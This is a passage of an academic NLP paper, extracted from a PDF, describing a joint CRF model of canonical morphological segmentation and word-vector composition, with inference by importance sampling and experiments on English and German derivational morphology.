6, pp. 33–48, 2018. Action Editor: Regina Barzilay. Submission batch: 5/2016; Revision batch: 10/2016; Published 1/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. face segmentation, our model performs canonical segmentation (Cotterell et al., 2016a; Cotterell et al., 2016b; Kann et al., 2016), i.e., it allows the induc- tion of orthographic changes together with the seg- mentation, which is not typical. For the example questionably, our model can restore the deleted char- acters le, yielding the canonical segments question, able and ly. In this work, our primary contribution lies in the integration of continuous semantic vec- tors into supervised morphological segmentation— we present a joint model of morphological analysis and semantic synthesis at the word-level. We experimentally investigate three novel aspects of our model. • First, we show that jointly modeling continu- ous representations of the semantics of mor- phemes and words allows us to improve mor- phological analysis. On the English portion of CELEX (Baayen et al., 1993), we achieve a 5 point improvement in segmentation accuracy and a 3 point improvement in morpheme F1. On the German DErivBase dataset we achieve a 3 point improvement in segmentation accu- racy and a 3 point improvement in morpheme F1. • Second, we explore improved models of vec- tor composition for synthesizing word mean- ing. We find a recurrent neural network im- proves over previously proposed additive mod- els. Moreover, we find that more syntactically oriented vectors (Levy and Goldberg, 2014a) are better suited for morphology than bag-of- word (BOW) models. • Finally, we explore the productivity of English derivational affixes in the context of distribu- tional semantics. 2 Derivational Morphology Two important goals of morphology, the linguistic study of the internal structure of words, are to de- scribe the relation between different words in the lexicon and to decompose them into morphemes, the smallest linguistic unit bearing meaning. Morphol- ogy can be divided into two types: inflectional and derivational. Inflectional morphology is the set of processes through which the word form outwardly displays syntactic information, e.g., verb tense. It follows that an inflectional affix typically neither changes the part-of-speech (POS) nor the semantics of the word. For example, the English verb to run takes various forms: run, runs, ran and running, all of which convey “moving by foot quickly”, but ap- pear in complementary syntactic contexts. Derivation deals with the formation of new words that have semantic shifts in meaning (often includ- ing POS) and is tightly intertwined with lexical se- mantics (Light, 1996). Consider the example of the English noun discontentedness, which is derived from the adjective discontented. It is true that both words share a close semantic relationship, but the transformation is clearly more than a simple inflec- tional marking of syntax. Indeed, we can go one step further and define a chain of words content 7→ contented 7→ discontented 7→ discontentedness. In the computational literature, derivational mor- phology has received less attention than inflectional. There are, however, two bodies of work on deriva- tion in computational linguistics. First, there is a series of papers that explore the relation between lexical semantics and derivation (Lazaridou et al., 2013; Zeller et al., 2014; Padó et al., 2015; Kisse- lew et al., 2015). All of these assume a gold mor- phological analysis and primarily focus on the ef- fect of derivation on distributional semantics. The second body of work, e.g., the unsupervised mor- phological segmenter MORFESSOR (Creutz and La- gus, 2007), does not deal with semantics and makes no distinction between inflectional and derivational morphology.3 Even though the boundary between inflectional and derivational morphology is a con- tinuum rather than a rigid divide (Haspelmath and Sims, 2013), there is still the clear distinction that derivation changes meaning whereas inflection does not. Our goal in this paper is to develop an account of how the meaning of a word form can be computed jointly, combining these two lines of work. Productivity and Semantic Coherence. We highlight two related issues in derivation that moti- vated the development of our model: productivity 3Narasimhan et al. (2015) also make no distinction between inflectional and derivational morphology, but their model is an exception in that it includes vector similarity as a semantic fea- ture. See §5 for discussion. 34 and semantic coherence. Roughly, a productive affix is one that can still actively be employed to form new words in a language. For example, the English nominalizing affix ness (red7→red+ness) can be attached to just about any adjective, including novel forms. In contrast, the archaic English nominal- izing affix th (dear7→dear+th, heal7→heal+th, steal7→steal+th) does not allow us to form new words such as cheapth. This is a crucial issue in derivational morphology since we would not in general want to analyze new words as having been formed from non-productive endings; e.g., we do not want to analyze hearth as hear+th (or wugth as wug+th). Relations such as those between heal and health are lexicalized since they no longer can be derived by productive processes (Bauer, 1983). Under a generative treatment (Chomsky, 1965) of morphology, productivity becomes a central no- tion since a grammar needs to account for active word formation processes in the language (Aronoff, 1976). Defining productivity precisely, however, is tricky; Aronoff (1976) writes, “one of the central mysteries of derivational morphology . . . [is that] . . . though many things are possible in morphology, some are more possible than others.” Nevertheless, speakers often have clear intuitions about which af- fixes in the language are productive.4 Related to productivity is the notion of seman- tic coherence. The principle of compositionality (Frege, 1892; Heim and Kratzer, 1998) applies to interpretation of words just as it does to phrases. In- deed, compositionality is often taken to be a sig- nal for productivity (Aronoff, 1976). When de- ciding whether to further decompose a word, ask- ing whether the parts sum up to the whole is of- ten a good indicator. In the case of questionably 7→ question+able+ly, the compositional meaning is “in a manner that could be questioned”, which corresponds to the meaning of the word. Contrast this with the word unquiet, which means “restless”, rather than “not quiet” and the compound blackmail, which does not refer to a letter written in black ink. The model we will describe in §3 is a joint model of both semantic coherence and segmentation; that 4It is also important to distinguish productivity from creativity—a non-rule-governed form of word formation (Lyons, 1977). As an example of creativity, consider the cre- ation of portmanteaux, e.g., dramedy and soundscape. is, an analysis is judged not only by character-level features, but also by the degree to which the word is semantically compositional. Implicit in such a treatment is the desire to only segment a word if the segmentation is derived from a productive process. While most prior work on morphological segmen- tation has not explicitly modeled productivity,5 we believe, from a computational modeling perspective, segmenting only productive affixes is preferable. This is analogous to the modeling of phrase compo- sitionality in embedding models, where it can be bet- ter to not further decompose noncompositional mul- tiword units like named entities and idiomatic ex- pressions; see, e.g., Mikolov et al. (2013b), Wang et al. (2014), Yin and Schütze (2015), Yaghoobzadeh and Schütze (2015), and Hashimoto and Tsuruoka (2016).6 In this paper, we refer to the semantic aspect of the model either as semantic synthesis or as coherence. These are two ways of looking at semantics that are related as follows. If the synthesis (i.e., composi- tion) of the meaning of the derived form from the meaning of its parts is a regular application of the linguistic rules of derivation, then the meaning so constructed is coherent. These are the cases where a joint model is expected to be beneficial for both segmentation and interpretation. 3 A Joint Model From an NLP perspective, canonical segmentation (Naradowsky and Goldwater, 2009; Cotterell et al., 2016b) is the task that seeks to algorithmically de- compose a word into its canonical sequence of mor- phemes. It is a version of morphological segmenta- tion that requires the learner to handle orthographic changes that take place during word formation. We believe this is a more natural formulation of mor- phological analysis—especially for the processing 5Note that segmenters such as MORFESSOR utilize the prin- ciple of minimum description length, which implicitly encodes productivity, in order to guide segmentation. 6As a reviewer points out, productivity of an affix and se- mantic coherence of the words formed from it are not perfectly aligned. Nonproductive affixes can produce semantically coher- ent words, e.g., warm 7→warm+th. Productive affixes can pro- duce semantically incoherent words, e.g., canny 7→un+canny. Again, this is analogous to multiword units. However, there is a strong correlation and our experiments show that relying on it gives good results. 35 un question able ly su ffi x su ffi x st em pr ef ix unquestionably + + + unquestionablely ⇡ surface form underlying form segmentation vector composition ta rg et Figure 1: A depiction of the joint model that makes the relation between the three factors and the observed sur- face form explicit. We show a simple additive model of composition for ease of explication. of derivational morphology—as it draws heavily on linguistic notions (see §2). The main innovation we present is the augmen- tation of canonical segmentation to take into ac- count semantic coherence and productivity. Con- sider the word hypercuriosity and its canonical seg- mentation hyper+curious+ity; this canonical seg- mentation seeks to decompose the word into its con- stituent morphemes and account for orthographic changes. This amounts to a structural decomposi- tion of the word, i.e., how do we break up the string of characters into chunks? This is similar to the de- composition of a sentence into a parse tree. How- ever, it is also natural to consider the semantic com- positionality of a word, i.e., how is the meaning of the word synthesized from the meaning of the indi- vidual morphemes? We consider both of these questions together in a single model, where we would like to place high probability on canonical segmentations that are also semantically coherent. Returning to hy- percuriosity, we could further decompose it into hyper+cure+ous+ity in analogy to, say, vice 7→ vicious. Nothing about the surface form of curi- ous alone gives us a strong cue that we should rule out the segmentation cure+ous. Turning to distri- butional semantics, however, it is the case that the contexts in which curious occurs are quite different from those in which cure occurs. This gives us a strong cue which segmentation is correct. Formally, given a word string w ∈ Σ∗, where Σ is a discrete alphabet of characters (in English this could be as simple as the 26 letter lowercase alpha- bet), and a word vector v ∈ V , where V is a set of low-dimensional word embeddings, we define the model as: p(v,s, l,u |w) = 1 Zθ(w) exp ( 1 2σ2 ||v −Cβ(s,l)||22 +f(s,l,u)>η + g(u,w)>ω ) . (1) This model is composed of three factors: composi- tion factor ( 1 2σ2 ||v−Cβ(s,l)||22), segmentation factor f and transduction factor g. The parameters of the model are θ = {β,η,ω}, the function Cβ composes morpheme vectors together, s is the segmentation, l is the labeling of the segments, u is the underlying representation and Zθ(w) is the partition function. Note that the conditional distribution p(v | s,l,u,w) is Gaussian distributed by construction. A visualiza- tion of our model is found in Figure 1. This model is a conditional random field (CRF) that is mixed, i.e., it is defined over both discrete and continuous random variables (Koller and Friedman, 2009). We restrict the range of u to be a subset of Σ|w|+k, where k is an insertion limit (Dreyer, 2011). In this work, we take k = 5. Explicitly, the partition function is defined as Zθ(w) = ∫ ∑ l′,s′,u′ exp ( 1 2σ2 ||v′ −Cβ(s′, l′)||22 + f(s′, l′,u′)>η + g(u′,w)>ω ) dv′, (2) which is guaranteed to be finite.7 A CRF is simply the globally renormalized prod- uct of several non-negative factors (Sutton and McCallum, 2006). Our model is composed of three: transduction, segmentation and composition factors—we describe each in turn. 3.1 Transduction Factor The first factor we consider is the transduction factor: exp ( g(u,w)>ω ) , which scores a surface 7Since we have capped the insertion limit, we have a finite number of values that u can take for any w. Thus, it follows that we have a finite number of canonical segmentations s. Hence we take a finite number of Gaussian integrals. These integrals all converge since we have fixed the covariance matrix as σ2I, which is positive definite. 36 representation (SR) w, the character string ob- served in raw text, and an underlying represen- tation (UR), a character string with orthographic processes reversed. The aim of this factor is to place high weight on good pairs, e.g., the pair (w=questionably,u=questionablely), so we can ac- curately restore character-level changes. We encode this portion of the model as a weighted finite-state machine for ease of computation. This factor generalizes probabilistic edit distance (Ristad and Yianilos, 1998) by looking at additional input and output context; see Cotterell et al. (2014) for de- tails. As mentioned above and in contrast to Cot- terell et al. (2014), we bound the insertion limit in the edit distance model.8 Computing the score be- tween two strings u and w requires a dynamic pro- gram that runs in O(|u|·|w|). This is a generalization of the forward algorithm for Hidden Markov Models (HMMs) (Rabiner, 1989). We employ standard feature templates for the task that look at features of edit operations, e.g., substi- tute i for y, in varying context granularities. See Cotterell et al. (2016b) for details. Recent work has also explored weighting of WFST arcs with scores computed by LSTMs (Hochreiter and Schmidhuber, 1997), obviating the need for human selection of feature templates (Rastogi et al., 2016). 3.2 Segmentation Factor The second factor is the segmentation factor: exp ( f(s,l,u)>η ) . The goal of this factor is to score a segmentation s of a UR u. In our example, it scores the input-output pair (u=questionablely, s=question+able+ly). It additionally scores a labeling of the segmentation. Our label set in this work is L = {stem, prefix, suffix}. The proper labeling of the segmentation above is l=question:stem+able:suffix+ly:suffix. The label- ing is critical for our composition functions Cβ (Cot- terell et al., 2015): which vectors are used depends on the label given to the segment; e.g., the vectors of the prefix “post” and the stem “post” are different. We can view this factor as an unnormalized first- 8As our transduction model is an unnormalized factor in a CRF, we do not require the local normalization discussed in Cotterell et al. (2014)—a weight on an edge may be any non- negative real number since we will renormalize later. The un- derlying model, however, remains the same. model composition function stem c = ∑N i=1 1li=stemm li si mult c = ⊙N i=1 m li si add c = ∑N i=1 m li si wadd c = ∑N i=1 αim li si fulladd c = ∑N i=1 Uim li si LDS hi = Xhi−1 + Umlisi RNN hi = tanh(Xhi−1 + Umlisi ) Table 1: Composition models Cβ(s,l) used in this and prior work. The representation of the word is hN for the dynamic and c for the non-dynamic models. Note that for the dynamic models h0 is a learned parameter. order semi-CRF (Sarawagi and Cohen, 2005). Com- putation of the factor again requires dynamic pro- gramming. The algorithm is a different generaliza- tion of the forward algorithm for HMMs, one that extends it to the semi-Markov case. This algorithm runs in O(|u|2 · |L|2). Features. We again use standard feature templates for the task. We create atomic indicator features for the individual segments. We then conjoin the atomic features with left and right context features as well as the label to create more complex feature templates. We also include transition features that fire on pairs of sequential labels. See Cotterell et al. (2015) for details. Recent work has also showed that a neural parameterization can remove the need for manual feature design (Kong et al., 2016). 3.3 Composition Factor The composition factor takes the form of an unnormalized multivariate Gaussian density: exp ( 1 2σ2 ||v −Cβ(s,l)||22 ) , where the mean is computed by the (potentially non-linear) compo- sition function (See Table 1) and the covariance matrix σ2I is a diagonal matrix. The goal of the composition function Cβ(s,l) is to stitch together morpheme embeddings to approximate the vector of the entire word. The simplest form of the composition function Cβ(s,l) is add, an additive model of the morphemes. See Table 1: each vector mlisi refers to a morpheme- 37 specific, label-dependent embedding. If li = stem, then si represents a stem morpheme. Given that our segmentation is canonical, an si that is a stem gen- erally itself is an entry in the lexicon and v(si) ∈ V . If v(si) 6∈ V , then we set v(si) to 0.9 We optimize over vectors with li ∈ {prefix, suffix} as they corre- spond to bound morphemes. We also consider a more expressive composition model, a recurrent neural network (RNN). Let N be the number of segments. Then Cβ(s,l) = hN where hi is a hidden vector, defined by the re- cursion:10 hi = tanh ( Xhi−1 + Um li si ) (Elman, 1990). Again, we optimize the morpheme embed- dings mlisi only when li 6= stem along with the other parameters of the RNN, i.e., the matrices U and X. 4 Inference and Learning Exact inference is intractable since we allow ar- bitrary segment-level features on the canonicalized word forms u. Since the semi-CRF factor has fea- tures that fire on substrings, we would need a dy- namic programming state for each substring of each of the exponentially many settings of u; this breaks the dynamic program. We thus turn to approximate inference through an importance sampling routine (Rubinstein and Kroese, 2011). 4.1 Inference by Importance Sampling Rather than considering all underlying orthographic forms u and segmentations s, we sample from a tractable proposal distribution q—a distribution over canonical segmentations. In the following equations we omit the dependence on w for notational brevity and define h(l,s,u) = f(s,l,u) + g(u,w). Cru- cially, the partition function Zθ(w) is not a function of parameter subvector β and its gradient with re- 9This is not changed in training, so all such v(si) are 0 in the final model. Clearly, this could be improved in future work as a reviewer points out, e.g., by setting such v(si) to an average of a suitable chosen set of known word vectors. 10We do not explore more complex RNNs, e.g., LSTMs (Hochreiter and Schmidhuber, 1997) and GRUs (Cho et al., 2014a) as words in our data have ≤7 morphemes. These archi- tectures make the learning of long distance dependencies eas- ier, but are no more powerful than an Elman RNN, at least in theory. Note that perhaps if applied to languages with richer derivational morphology than English, considering more com- plex neural architectures would make sense. spect to β is 0.11 Recall that computing the gradi- ent of the log-partition function is equivalent to the problem of marginal inference (Wainwright and Jor- dan, 2008). We derive our estimator as follows: ∇θ log Z = E (l,s,u)∼p [h(l,s,u)] (3) = ∑ l,s,u p(l,s,u)h(l,s,u) (4) = ∑ l,s,u q(l,s,u) q(l,s,u) p(l,s,u)h(l,s,u) (5) = E (l,s,u)∼q [ p(l,s,u) q(l,s,u) h(l,s,u) ] , (6) where we have omitted the dependence on w (which we condition on) and v (which we marginalize out). So long as q has support everywhere p does (i.e., p(l,s,u) > 0 ⇒ q(l,s,u) > 0), the estimate is un- biased. Unfortunately, we can only efficiently com- pute p(l,s,u) up to a constant factor, p(l,s,u) = p̄(l,s,u)/Z′θ(w). Thus, we use the indirect impor- tance sampling estimator, 1 ∑M i=1 w (i) M∑ i=1 w(i)h(l(i),s(i),u(i)), (7) where (l(1),s(1),u(1)) . . . (l(M),s(M),u(M)) i.i.d.∼ q and importance weights w(i) are defined as: w(i) = p̄(l(i),s(i),u(i)) q(l(i),s(i),u(i)) . (8) This indirect estimator is biased, but consistent.12 Proposal Distribution. The success of impor- tance sampling depends on the choice of a “good” proposal distribution, i.e., one that ideally is close to p. Since we are fully supervised at training time, we have the option of training locally normalized distributions for the individual components. Con- cretely, we train two proposal distributions q1(u | w) and q2(l,s | u) that take the form of a WFST and a semi-CRF, respectively, using features identical 11The subvector β is responsible for computing only the mean of the Gaussian factor and thus has no impact on its nor- malization coefficient (Murphy, 2012). 12Informally, the indirect importance sampling estimate con- verges to the true expectation as M → ∞ (the definition of statistical consistency). 38 to the joint model. Each of these distributions is tractable—we can compute the marginals with dy- namic programming and thus sample efficiently. To draw samples (l,s,u) ∼ q, we sample sequentially from q1 and then q2, conditioned on the output of q1. 4.2 Learning We optimize the log-likelihood of the model using ADAGRAD (Duchi et al., 2011), which is SGD with a special per-parameter learning rate. The full gra- dient of the objective for one training example is: ∇θ log p(v,s, l,u | w) = f(s,l,u)> + g(u,w)> − 1 σ2 (v −Cβ(s,l))∇θCβ(s,l) −∇θ log Zθ(w), (9) where we use the importance sampling algorithm described in §4.1 to approximate the gradient of the log-partition function, following Bengio and Senecal (2003). Note that ∇θCβ(s,l) depends on the composition function used. In the most com- plicated case when Cβ is a RNN, we can com- pute ∇βCβ(s,l) efficiently with backpropagation through time (Werbos, 1990). We take M = 10 im- portance samples; using so few samples can lead to a poor estimate of the gradient, but for our application it suffices. We employ L2 regularization. 4.3 Decoding Decoding the model is also intractable. To approxi- mate the solution, we again employ importance sam- pling. We take M =10,000 importance samples and select the highest weighted sample. 5 Related Work The idea that vector semantics is useful for mor- phological segmentation is not new. Count vectors (Salton, 1971; Turney and Pantel, 2010) have been shown to be beneficial in the unsupervised induction of morphology (Schone and Jurafsky, 2000; Schone and Jurafsky, 2001). Embeddings were shown to act similarly (Soricut and Och, 2015). Our method differs from this line of research in two key ways. (i) We present a probabilistic model of the pro- cess of synthesizing the word’s meaning from the meaning of its morphemes. Prior work was ei- ther not probabilistic or did not explicitly model morphemes. (ii) Our method is supervised and fo- cuses on derivation. Schone and Jurafsky (2000) and Soricut and Och (2015), being fully unsupervised, do not distinguish between inflection and deriva- tion and Schone and Jurafsky (2001) focus on in- flection. More recently, Narasimhan et al. (2015) look at the unsupervised induction of “morpholog- ical chains” with semantic vectors as a crucial fea- ture. Their goal is to jointly figure out an ordering of word formation and a morphological segmenta- tion, e.g., play7→playful7→playfulness. While it is a rich model like ours, theirs differs in that it is un- supervised and uses vectors as features, rather than explicitly treating vector composition. All of the above work focuses on surface segmentation and not canonical segmentation, as we do. A related line of work that has different goals con- cerns morphological generation. Two recent papers that address this problem using deep learning are Faruqui et al. (2016a) and Faruqui et al. (2016b). In an older line of work, Yarowsky and Wicen- towski (2000) and Wicentowski (2002) exploit log frequency ratios of inflectionally related forms to tease apart that, e.g., the past tense of sing is not singed, but instead sang. Related work by Dreyer and Eisner (2011) uses a Dirichlet process to model a corpus as a “mixture of a paradigm”, allowing for the semi-supervised incorporation of distribu- tional semantics into a structured model of inflec- tional paradigm completion. Our work is also related to recent attempts to in- tegrate morphological knowledge into general em- bedding models. For example, Botha and Blun- som (2014) train a log-bilinear language model that models the composition of morphological structure. Likewise, Luong et al. (2013) train a recursive neural network (Goller and Küchler, 1996) over a heuristi- cally derived tree structure to learn morphological composition over continuous vectors. Our work is different in that we learn a joint model of segmen- tation and composition. Moreover, supervised mor- phological analysis can drastically outperform unsu- pervised analysis (Ruokolainen et al., 2013). Early work by Kay (1977) can be interpreted as finite-state canonical segmentation, but it neither ad- dresses nor experimentally evaluates the question of joint modeling of morphological analysis and se- mantic synthesis. Moreover, we may view canoni- 39 dev test Model Acc F1 Edit Acc F1 Edit E N Semi-CRF (Baseline) 0.55 (.018) 0.75 (.014) 0.80 (.043) 0.54 (.018) 0.75 (.014) 0.78 (.034) Joint (Baseline) 0.77 (.011) 0.87 (.007) 0.41 (.029) 0.77 (.013) 0.87 (.007) 0.43 (.029) Joint + Vec (This Work) 0.83 (.014) 0.91 (.008) 0.31 (.019) 0.82 (.020) 0.90 (.011) 0.32 (.038) Joint + UR (Oracle) 0.94 (.015) 0.96 (.009) 0.07 (.016) 0.94 (.011) 0.96 (.007) 0.07 (.011) Joint + UR + Vec (Oracle) 0.95 (.011) 0.97 (.007) 0.05 (.013) 0.95 (.023) 0.97 (.006) 0.05 (.025) D E Semi-CRF (Baseline) 0.39 (.062) 0.68 (.039) 1.15 (.230) 0.39 (.058) 0.68 (.042) 1.14 (.240) Joint (Baseline) 0.79 (.107) 0.88 (.069) 0.40 (.313) 0.79 (.099) 0.87 (.063) 0.41 (.282) Joint + Vec (This Work) 0.82 (.102) 0.90 (.067) 0.33 (.312) 0.82 (.096) 0.90 (.061) 0.33 (.282) Joint + UR (Oracle) 0.86 (.108) 0.90 (.070) 0.25 (.288) 0.86 (.100) 0.90 (.064) 0.25 (.268) Joint + UR + Vec (Oracle) 0.87 (.106) 0.92 (.069) 0.20 (.285) 0.88 (.096) 0.93 (.062) 0.19 (.263) Table 2: Results for the canonical morphological segmentation task on English and German. Standard deviation is given in parentheses. We compare against two baselines that do not make use of semantic vectors: (i) “Semi-CRF (baseline)”, a semi-CRF that cannot account for orthographic changes and (ii) “Joint (Baseline)”, a version of our joint model without vectors. We also compare against an oracle version with access to gold URs (“Joint + UR (Oracle)”, “Joint + UR + Vec (Oracle)”), revealing that the toughest part of the canonical segmentation task is reversing the orthographic changes. calization as an orthographic analogue to phonology. On this interpretation, the finite-state systems of Ka- plan and Kay (1994), which computationally apply SPE-style phonological rules (Chomsky and Halle, 1968), may be run backwards to get canonical un- derlying forms. 6 Experiments and Results We conduct experiments on English and German derivational morphology. We analyze our joint model’s ability to segment words into their canoni- cal morphemes as well as its ability to composition- ally derive vectors for new words. Finally, we ex- plore the relationship between distributional seman- tics and morphological productivity. For English, we use the pretrained vectors of Levy and Goldberg (2014a) for all experiments. For German, we train word2vec skip-gram vectors on the German Wikipedia. We first describe our En- glish dataset, the subset of the English portion of the CELEX lexical database (Baayen et al., 1993) that was selected by Lazaridou et al. (2013); the dataset contains 10,000 forms. This allows for com- parison with previously proposed methods. We make two modifications. (i) Lazaridou et al. (2013) make the two-morpheme assumption: every word is composed of exactly two morphemes. In general, this is not true, so we further segment all complex words in the corpus. For example, friendless+ness is further segmented into friend+less+ness. To nevertheless allow for fair comparison, we pro- vide versions of our experiments with and without the two-morpheme assumption where appropriate. (ii) Lazaridou et al. (2013) only provide a single train/test split. As we require a held-out develop- ment set for hyperparameter tuning, we randomly allocate a portion of the training data to select the hyperparameters and then retrain the model using these parameters on the original train split. We also report 10-fold cross validation results in addition to Lazaridou et al.’s train/test split. Our German dataset is taken from Zeller et al. (2013) and is described in Cotterell et al. (2016b). It, again, consists of 10,000 derivational forms. We report results on 10-fold cross validation. 6.1 Experiment 1: Canonical Segmentation For our first experiment, we test whether jointly modeling the continuous representations allows us to segment words more accurately. We assume that we are given an embedding for the target word. We estimate the model p(v,s, l,u | w) as described in §4 with L2 regularization λ||θ||22. To evaluate, we decode the distribution p(s,l,u | v,w). We per- form approximate MAP inference with importance sampling—taking the sample with the highest score. 40 EN DE BOW2 BOW5 DEPs SG dev test dev test dev test dev test or ac le stem .403 .402 .374 .376 .422 .422 .400 .405 add .635 .635 .541 .542 .787 .785 .712 .711 LDS .660 .660 .566 .568 .806 .804 .717 .718 RNN .660 .660 .565 .567 .807 .806 .707 .712 jo in t stem .399 .400 .371 .372 .411 .412 .394 .398 add .625 .625 .524 .525 .782 .781 .705 .704 LDS .648 .648 .547 .547 .799 .797 .712 .711 RNN .649 .647 .547 .546 .801 .799 .706 .708 ch ar GRU .586 .585 .452 .452 .769 .768 .675 .667 LSTM .586 .586 .455 .455 .768 .767 .677 .666 Table 3: Vector approximation (measured by mean co- sine similarity) both with (“oracle”) and without (“joint”, “char”) gold morphology. Surprisingly, joint models are close in performance to models with gold morphology. In these experiments, we use the RNN with the de- pendency vectors, the combination of which per- forms best on vector approximation in §6.2. We follow the experimental design of Cotterell et al. (2016b). We compare against two base- lines (marked “Baseline” in Table 2): (i) a “Semi- CRF” segmenter that cannot account for ortho- graphic changes and (ii) the full “Joint” model of Cotterell et al. (2016b).13 We additionally consider an “Oracle” setting, where we give the model the gold underlying orthographic form (“UR”) at both training and test time. This gives us insight into the performance of the transduction factor of our model, i.e., how much could we benefit from a richer model. Our hyperparameters are (i) the regularization coefficient λ and (ii) σ2, the variance of the Gaussian factor. We use grid search to tune them: λ ∈ {0.0, 101, 102, 103, 104, 105}, σ2 ∈ {0.25, 0.5, 0.75, 1.0}. Metrics. We use three metrics to evaluate segmen- tation accuracy. Note that the evaluation of canon- ical segmentation is hard since a system may re- turn a sequence of morphemes whose concatenation is not the same length as the concatenation of the gold morphemes. This rules out metrics for surface segmentation like border F1 (Kurimo et al., 2010), which require the strings to be of the same length. We now define the metrics. (i) Segmentation accuracy measures whether every single canonical morpheme in the returned sequence is correct. It is inflexible: closer answers are penalized the same as 13i.e., a model without the Gaussian factor that scores vectors. more distant answers. (ii) Morpheme F1 (van den Bosch and Daelemans, 1999) takes the predicted se- quence of canonical morphemes, turns it into a set, computes precision and recall in the standard way and based on that then computes F1. This metric gives credit if some of the canonical morphemes were correct. (iii) Levenshtein distance joins the canonical segments with a special symbol # into a single string and computes the Levenshtein distance between predicted and gold strings. Discussion. Results in Table 2 show that jointly modeling semantic coherence improves our ability to analyze words. For test, our proposed joint model (“This Work”) outperforms the baseline supervised canonical segmenter, which is state-of-the-art for the task, by .05 (resp. .03) on accuracy and .03 (resp. .03) on F1 for English (resp. German). We also find that when we give the joint model an oracle UR the vectors generally help less: .01 (resp. .02) on ac- curacy and .01 (resp. .03) on F1 for English (resp. German). This indicates that the chief boon the vec- tor composition factor provides lies in selection of an appropriate UR. Moreover, the up to .15 differ- ence in English between systems with and without the oracle UR suggests that reversing orthographic changes is a particularly difficult part of the task, at least for English. 6.2 Experiment 2: Vector Approximation We adopt the experimental design of Lazaridou et al. (2013). Its aim is to approximate a vector of a derivationally complex word using a learned model of composition. As Lazaridou et al. (2013) assume a gold morphological analysis, we compare two set- tings: (i) oracle morphological analysis and (ii) in- ferred morphological analysis. To the best of our knowledge, (ii) is a novel experimental condition that no previous work has addressed. We consider four composition models (See Ta- ble 1). (i) stem, using just the stem vector. This baseline tells us what happens if we make the incor- rect assumption that derivation behaves like inflec- tion and is not meaning-changing. (ii) add, a purely additive model. This is arguably the simplest way of combining the vectors of the morphemes. (iii) LDS, a linear dynamical system. This is arguably the sim- plest sequence model. (iv) A (simple) RNN. Recur- 41 all HR LR -less in- un- L az ar id ou stem .47 .52 .32 .22 .39 .33 mult .39 .43 .28 .23 .34 .33 dil. .48 .53 .33 .30 .45 .41 wadd .50 .55 .38 .24 .40 .34 fulladd .56 .61 .41 .38 .47 .44 lexfunc .54 .58 .42 .44 .45 .46 B O W 2 stem .43 .44 .38 .32 .43 .51 add .65 .67 .61 .60 .64 .67 LDS .67 .69 .62 .61 .66 .67 RNN .67 .69 .60 .60 .65 .66 c-GRU .59 .60 .55 .59 .55 .57 c-LSTM .52 .53 .50 .55 .50 .50 B O W 5 stem .40 .43 .33 .27 .37 .46 add .56 .59 .51 .46 .55 .59 LDS .58 .61 .51 .48 .57 .60 RNN .58 .61 .50 .48 .56 .58 c-GRU .45 .47 .42 .42 .43 .45 c-LSTM .46 .47 .43 .43 .45 .46 D E P s stem .46 .45 .49 .38 .57 .67 add .79 .79 .77 .78 .80 .80 LDS .80 .81 .77 .79 .81 .81 RNN .81 .82 .77 .79 .80 .81 c-GRU .75 .76 .72 .78 .74 .75 c-LSTM .75 .76 .71 .77 .72 .73 Table 4: Vector approximation (measured by mean cosine similarity) with gold morphology on the train/test split of Lazaridou et al. (2013). HR/LR = high/low-relatedness words. See Lazaridou et al. (2013) for details. rent neural networks are currently the most widely used nonlinear sequence model and simple RNNs are the simplest such models. Part of the motivation for considering a richer class of models lies in our removal of the two- morpheme assumption. Indeed, it is unclear that the wadd and fulladd models (Mitchell and Lapata, 2008) are useful models in the general case of multi- morphemic words—the weights are tied by position, i.e., the first morpheme’s vector (be it a prefix or stem) is always multiplied by the same matrix. Comparison with Lazaridou et al. To compare with Lazaridou et al. (2013), we use their exact train/test split. Those results are reported in Table 4. This dataset enforces that all words are composed of exactly two morphemes. Thus, a word like unques- tionably is segmented as un+questionably, with- out further decomposition. The vectors employed by Lazaridou et al. (2013) are high-dimensional count vectors derived from lemmatized and POS tagged text with a before-and-after window of size 2. They then apply pointwise mutual informa- tion (PMI) weighting and dimensionality reduction by non-negative matrix factorization. In contrast, we employ WORD2VEC (Mikolov et al., 2013a), a model that is also interpretable as the factorization of a PMI matrix (Levy and Goldberg, 2014b). We con- sider three WORD2VEC models: two bag-of-word (BOW) models with before-and-after windows of size 2 and 5 and DEPs (Levy and Goldberg, 2014a), a dependency-based model whose context is derived from dependency parses rather than BOW. In general, the results indicate that the key to better vector approximation is not a richer model of composition, but rather lies in the vectors them- selves. We find that our best model, the RNN, only marginally edges out the LDS. Additionally, looking at the “all” column and the DEPs vectors, the sim- ple additive model is only ≤.02 lower than LDS. In comparison, we observe large differences between the vectors. The RNN+DEPs model is .23 bet- ter than the BOW5 models (.81 vs. .58), .14 better than the BOW2 models (.81 vs. .67) and .25 bet- ter than Lazaridou et al.’s best model (.81 vs. .56). A wider context for BOW (5 instead of 2) yields worse results. This suggests that syntactic infor- mation or at least positional information is neces- sary for improved models of morpheme composi- tion. The test vectors are annotated for relatedness, which is a proxy for semantic coherence. HR (high- relatedness) words were judged to be more compo- sitional than LR (low-relatedness) words. Character-Level Neural Retrofitting. As a fur- ther strong baseline, we consider a retrofitting (Faruqui et al., 2015) approach based on character- level recurrent neural networks. Recently, running a recurrent net over the character stream has become a popular way of incorporating subword information into a model—empirical gains have been observed in a diverse set of NLP tasks: POS tagging (dos Santos and Zadrozny, 2014; Ling et al., 2015), pars- ing (Ballesteros et al., 2015) and language modeling 42 (Kim et al., 2016). To the best of our knowledge, character-level retrofitting is a novel approach. Given a vector v for a word form w, we seek a function to minimize the following objective 1 2 ||v −hN||22, (10) where hN is the final hidden state of a recurrent neu- ral architecture, i.e., hi = σ(Ahi−1 + Bwi), (11) where σ is a non-linearity and wi is the ith char- acter in w, hi−1 is the previous hidden state and A and B are matrices. While we have defined the architecture for a vanilla RNN, we experiment with two more advanced recurrent architectures: GRUs (Cho et al., 2014b) and LSTMs (Hochreiter and Schmidhuber, 1997) as well as deep variants (Sutskever et al., 2014; Gillick et al., 2016; Firat et al., 2016). Importantly, this model has no knowledge of morphology—it can only rely on representations it extracts from the characters. This gives us a clear ablation on the benefit of adding structured morpho- logical knowledge. We optimize the depth and the size of the hidden units on development data using a coarse-grained grid search. We found a depth of 2 and hidden units of size 100 (in both LSTM and GRU) performed best. We trained all models for 100 iterations of Adam (Kingma and Ba, 2015) with L2 regularization with regularization coefficient 0.01. Table 4 shows that the two character-level mod- els (“c-GRU” and “c-LSTM”) perform much worse than our models. This indicates that supervised mor- phological analysis produces higher-quality vector representations than “knowledge-poor” character- level models. However, we note that these character-level 